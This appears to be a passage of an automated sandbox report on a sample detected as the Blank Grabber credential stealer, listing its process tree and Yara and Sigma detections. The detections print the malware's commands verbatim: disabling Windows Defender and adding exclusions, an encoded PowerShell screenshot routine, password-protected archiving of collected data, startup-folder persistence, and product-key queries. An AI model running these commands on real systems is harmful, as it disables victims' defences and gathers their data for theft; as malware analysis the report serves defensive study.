        • WMIC.exe (PID: 5424 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4296 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4180 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6392 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3780 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7824 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 10 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", ProcessId: 1868, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5988, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", ProcessId: 7312, ProcessName: cmd.exe
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
